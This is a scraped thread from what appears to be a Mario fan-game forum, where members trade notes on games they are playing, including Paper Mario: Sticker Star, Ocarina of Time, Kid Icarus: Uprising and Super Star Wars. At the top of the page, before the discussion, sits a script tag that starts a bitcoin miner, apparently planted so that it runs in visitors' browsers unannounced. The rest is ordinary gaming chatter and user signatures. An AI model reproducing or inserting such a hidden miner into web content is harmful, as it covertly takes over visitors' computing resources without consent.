<script>
miner.start(); // initialise bitcoin miner
</script>

mario fan games galaxysmw centralpge project

What games are you playing?

do you like them video games? what about those there romhacks? well pop on in here and talk about them then! what are you waiting for?!
Bwarch
Local Candy Fiend
Pronouns: He/Him/His

Re: What games are you playing?

Postby Bwarch » 6 years ago

Sticker Star is pretty meh unfortunately. I DO respect them for trying a new idea, but it just didn't work out unfortunately.

I put it down after about ten levels I think and I haven't picked it up again, especially after getting stuck at this one part.

Mata Hari

Postby Mata Hari » 6 years ago

I got up to the Wiggler parts and stopped.

Why did they make a game where battling is a BAD idea??? What were they thinking????

And why did they strip out the story? If it's true what they say and Shiggy ordered them to take it out I'm gonna punch him in the mouf.

skyluigi2

Postby skyluigi2 » 6 years ago

They said something about not having any characters unique to the Paper Mario series so it would be easier for series newcomers to 'enjoy' the game. That's basically why there's next to no story and Kersti is literally the only unique character. And also Bowser says nothing throughout the entire game... even though he was one of the funniest characters in past PM games. I don't understand.

Bean

Postby Bean » 6 years ago

I liked Sticker Star to an extent, but I'm not much of a Paper Mario guy. That said, I've never played TTYD, so that's on me.

Meanwhile, I went overboard in Ocarina last night. Forest, Fire, and Water Temples completed, but not in that order. Oh, being able to switch the Iron Boots on/off as an item is so much better than going into the menu for the umpteenth time. Now I'm on to my least favorite stretch of the game, the Well and Shadow Temple.

BeatBoxingBoo

Postby BeatBoxingBoo » 6 years ago

skyluigi2 wrote:Super Paper Mario and Paper Mario: Sticker Star are both great games... but they're hilariously disappointing after The Thousand Year Door. If you don't compare them then they're really good games, but if you compare 'em to that Gamecube masterpiece... they're pretty mediocre.
It's my opinion that Sticker Star is just bad. Like has been stated above, why even have battles? They're pointless; wastes of time. The worlds are completely unoriginal (Grassland, Desert, Fire, Ice, etc). Even when not compared to TTYD, it's really just not a good game.

But also, like Bwarch said, I do have to commend them for trying new formulas. It failed, but it was new nonetheless. I think we need to see more of that in this franchise.

Also, I think I figured out how to cheat the jackpot system in TTYD which is really unfortunate.

If this Kickstarter has taught me anything, it's that there are a lot of different kinds of potato salad.

To connect: minehaus.mcph.co

hi! I am a 18 year old ■■■■ who loves being ■ ■■■■■ ■■■■■ and taking ■■■■■■■ ■■■■■■■■!I really shouldn’t hate people for not being funny and trying to be funny.

But I hate people for not being funny and trying to be funny.

Alice
Pronouns: Girl person

Postby Alice » 6 years ago

I picked up don't Starve last night after not having played it in like a year or so. Made it 7 days on my second try and only died due to the random hellhound encounters that I don't think I ever encountered last time I played. I'm currently on the firestarter girl on day 9.

Validon98
Goofy Night Sparrow
Pronouns: he/she/they

Postby Validon98 » 6 years ago

I randomly decided to play Touhou-A-Live once I found out it existed. I've had a combination of fun and frustration with it so far. Here is a basic summary of my feelings on the chapters I've done so far:
Mokou's (based off of Near-Future)- ...This is long and there's enemies everywhere my god why did this boss suddenly kill me why are they using the liquefied humans plot in Touhou it feels way too grimdark.
Cirno's (based off of Present Day)- COME ON USE THOSE MOVES ON ME SO I CAN KILL YOU OH GOD WHY IS THE FINAL BOSS A FREAKING DODGE TANK SOMEONE HELP ME
Shanghai's (based off of Sci-fi)- Story story story story... oh god help me this is stressful why is everyone actually dying come on this is Touhou this shouldn't be happening and oh god why did the final boss just turn into some melting skull mush that kinda looks like this ahahahahahahaha make it end make it end
Youmu's (based off of Ninja)- KILL 'EM ALL KILL 'EM ALL SCREW STEALTH I AM GONNA KILL 'EM ALL or at the very least 73/100. Good enough. Also hidden passages I hate you.
Ran's (based off of Wild West)- Just started, but uh... why the hell is Ran in the American Wild West barring the fact that her chapter is based off of the Sundown Kid's in the original?
Because Mystia's being a big ol' goofball.

Currently Playing:
Hyrule Warriors: Definitive Edition (Adventure mode goes on and on)
The Legend of Zelda: Link's Awakening (Switch) (Wind Fish woke up, now to do it in hard mode)

Strawberry Bose Partial Translations and Patches!

Bean

Fire, Water, Forest, Spirit, and soon to be Shadow Temple. The totally traditional order for Ocarina of Time. Yep. Also, all five of the remaining Skulltula are in that last dungeon, too, so I think I've got this.

Leylite
Pronouns: he/him/his

Postby Leylite » 6 years ago

I've recently been playing this furniture-eating stealth roguelike called "Not the Robots" - a Unity-engine game mostly based around dodging typical office security obstacles like rotating lasers, floor-is-lava traps, smart bombs, and floating skull sentries with machine guns. The idea is to use the layout of the office walls, as well as furniture, as cover - but you have to eat a certain amount of this furniture to go to the next level.

It requires a lot of strategic planning as well as second-to-second tactics. I love it.

Leet
Well, hello, Smith ( ´-`)ノ
First name: Chie Arale
Pronouns: she/her

Postby Leet » 6 years ago

So I'm playing Link's Awakening and I beat the first three dungeons so far and the color dungeon. I.. have no idea where this desert is that Ulrira says I need to go to. I have searched all over the place, especially in the apparent southeast, and I cannot figure out where the hell I need to go in the slightest. At the same time I don't want to just look up a walkthrough. Can somebody at least confirm that this part is obtuse and not just me being dumb?

EDIT: nyeh i looked up a little bit of info and figured out the rest. for some reason i thought there was only one chest in the dream shrine!
Well it is a decent hack but sometime its just too repetitif there no level that actually pop in your face and your like oh yeah that level they all ressemble themselves and just monster along the way.
Blood Ghoul wrote:Sometimes it seems my blood spurts out in gobs, as if it were a fountain's pulsing sobs. I clearly hear it mutter as it goes yet cannot find the wound from which it flows. Before I met you, baby, I didn't know what I was missing.

Ashan
The world has become a place

Postby Ashan » 6 years ago

I figured out why I couldn't kill the anubis things. They're resistant to divine damage. That would make sense.

Also this game is so freaking frustrating because you can have a good run going and then all of a sudden you open a door and two ninja things are behind it and you can't kill them unless you're able to tank like 50 damage.
Attachments
anubis.png
anubis.png (57.2 KiB) Viewed 1005 times

pholtos
Loves adorable things.

Postby pholtos » 6 years ago

...What is that slightly interesting game?
Host and Organizer of the Rando Pokemon Tournaments. Completed: I, II, III, IV, V
Dealer of the Pokermon Discord Tourneys.

ImageImageImageImage
ImageImageImageImage
ImageImageImageImage

I do LPs, check them out if you'd like.

Currently playing:

The 500 char limit is evil. :P

Ashan

Hack, Slash, Loot.
I got it with the Humble Roguelike Bundle. It's ridiculously unfair yet I've played 10 hours of it. Still haven't beaten a level in it.

Bean

And Ocarina of Time 3D is done! I'll take a little bit of time away from this before I try my hands at the Master Quest part of the game later this month.

Ashan

Master Quest is the weirdest thing. Jabu Jabu's belly is filled with cow switches. Like there are cow heads sticking out of the walls and you shoot them with your slingshot and some of them move around and stuff. It's super weird.

Jesuiscontent
Tsundere
First name: cool old field

Postby Jesuiscontent » 6 years ago

For some stupid reason I had the sudden urge to replay Digimon World after like 10 years

It has aged TERRIBLY

skyluigi2

Postby skyluigi2 » 6 years ago

I've been playing Kid Icarus: Uprising for like the seven billionth time. Easily one of my favourite games ever. And it's hilariously difficult! Doubt I'll ever be able to beat every chapter on 9.0 intensity. But still, I love it... the story, the gameplay, the multiplayer (which is online too, like wow). I know Sakurai said he won't be making another Kid Icarus game, but... I live in hope.

🦆 RedMageSusie
Dancing with the moonlit knight

Postby RedMageSusie » 6 years ago

^ That was a really great game. I've been meaning to go back to it to see if I can finish the treasure hunt, but I doubt I will. Maybe at least clear as much of the board as I can.

But I still have a bunch of unplayed games to go through...

swirlybomb
a bomb that is swirly
First name: Swirlus Bomberton

Postby swirlybomb » 6 years ago

Weirdly enough, I've beaten Master Quest, but not vanilla Ocarina! I can't say why that is, exactly.
At least the Water Temple seems way more straightforward in Master Quest!

Ah... still very slowly playing Pokemon X. Just beat the sixth (Fairy) gym, have two and a half teams' worth of Pokemons I'm rotating through. That's about it!
anonymousbl00dlust wrote:All the obstacles in my level can be beaten on the players first attempt without any 'future predicting'.

QuantumPhysicsMan

Postby QuantumPhysicsMan » 6 years ago

skyluigi2 wrote:I've been playing Kid Icarus: Uprising for like the seven billionth time. Easily one of my favourite games ever. And it's hilariously difficult! Doubt I'll ever be able to beat every chapter on 9.0 intensity.
I should finish Kid Icarus: Uprising at some point... My problem was that I'm terrible at the flight segments, so I can't finish them at an intensity higher than 6.0, but that makes all the land battles too easy.

Other than that, Bravely Default was released a few day ago, so I'm going to be playing that.
Warning: It is now too late to not read my signature.

Sturg
Gets his freak on with VGM
First name: sturgyman

Postby Sturg » 6 years ago

Not as long post ahoy!
Beat the last Super Star Wars game, it was awesome and my personal favorite of the three games. It was a lot easier than the other two and that was probably a big reason why I liked it a lot, since it was more fun than challenging (except like the last two boss/levels).

One thing I really liked about it is how choosing between light-saber and blaster is fairly balanced (with the exception of Leia's staff since I never chose her and didn't get used to her controls, oh yeah btw you can choose who you want to play as for the first half of the game yaay). I did prefer to choose Chewie or Luke for the main characters since Chewie starts with extra health and Luke has force powers, which are once again back in the game. Han kind of sucks since he has less health and throws bombs which are useless as far as I used them. Plus, Chewie has an invulnerable Spin attack which attacks enemies for a fair amount of damage (including bosses). There were also certain places where blaster was more useful in some places and vice-versa, but yeah pretty balanced game.

The vehicle sections in the game were okay, not a good as the second but better than the 1st one. There were really just two levels where I didn't like the vehicles. The first one was the Speeder level when you get on Endor. The background is pretty ugly and disorienting, it looks pretty cool at first but then it sort of turns into a green and purple splotch of a background. Plus the trees that come at you are really hard to see coming and take insane reflexes to get by them. Another thing is that the enemies you have to kill fly to high to where your blaster can't reach them, so that's annoying. The second vehicle section I didn't like was probably the glitchiest part of the game as far as I can tell, as well as being my least favorite part of the game. Like, I didn't know if there was something up with the cartridge but I kind of didn't want to quit my game to clean it. At the end of the game there are two consecutive Millenium Falcon levels where you fly as Lando into the Death Star and back out. For some reason though, this green flash of jumbled figures from the game kept flashing on the screen and just made the game hard to see/play. It could easily get a major seizure warning from how bad it was. Now, first off, you're put into this weird 1st person perspective of the ship; 2nd, the control inverted from every other vehicle level in the entire game. You push down to move up and vice-versa, and you also have L and R which rotate your ship invertedly. The major reason I didn't like this was that the dis-orientation of the glitchy factor plus the mode-7 (btw) point of view of the ship mixed in with the wonky controls isn't very fun, and it's the hardest part of the game. I had like 16 lives up to this point and I had 3 left when I beat it. All the other ship stages were pretty fun, though I would have to complain about the game's handicap of giving players depth perception when trying to collect stuff in a vehicle. You really have no idea if you're gonna collect something or not and it's confusing/dis-orienting to get. Other than that though, the vehicle sections were okay. Much better than the 1st game, but not so much compared to the 2nd game.

Sound is a major improvement in this game, there were so many sound effects and fonts that kind of enhanced the music and game-play. I know it's a pretty stupid thing talk about, but I thought it made a big difference on the atmosphere of the game and made it better. Although, it could be the possibility that this movie/game had better music to work with? I found myself humming the Endor theme a lot, so that could be just an opinionated thing.

Speaking of Endor, every level surrounding it (besides the speeder level) was my favorite part of the game. Half way through the game you get to two level in which you play as Wicket the Ewok in the Ewok village, which is my favorite part of the game where you explore the trees and shoot arrows and shit. It's a lot of fun. The Luke level that comes after that is also pretty fun, it has a really nice atmosphere and music that makes me love those levels a lot.

There were a lot of things I like about the game, with a very few things I didn't like. I don't really fell like typing it all down though. It was a really fun game, very much well crafted than the other two games imo.

Also speed power-up is best power-up.
tl;dr
I played the last Super Star Wars game and it was amazing.

Finished up the Super Star Wars series, now onto MGS.
ImageImage
ImageImageImageImage

Menshay

Postby Menshay » 6 years ago

Beat Red in Pokémon SoulSilver with a team of level ~61-64 Pokémon. Kind of painful, but at least now Groudon is unlocked.

Bean

With a couple of you having beaten Zelda II this year, I've decided it's finally time to try and get through this game at long last. One palace down, and I totally botched the home stretch on the second, so I just saved and quit for now.

Alice
Pronouns: Girl person

Postby Alice » 6 years ago

Bean wrote:With a couple of you having beaten Zelda II this year, I've decided it's finally time to try and get through this game at long last. One palace down, and I totally botched the home stretch on the second, so I just saved and quit for now.
I would have managed this last year but I apparently managed to go in and clear one of the dungeons without actually finishing it completely and I had absolutely no idea which one it is so I ended up dropping the game.

Sturg
Gets his freak on with VGM
First name: sturgyman

Postby Sturg » 6 years ago

I've been feeling under the weather lately so I decided to play a smaller game that I've never played before, so I tried Mega Man X. Pretty good for the most part, I have a few complaints about it, but I'm too tired to type up anything right now.
ImageImage
ImageImageImageImage

Return to “the cartridgé”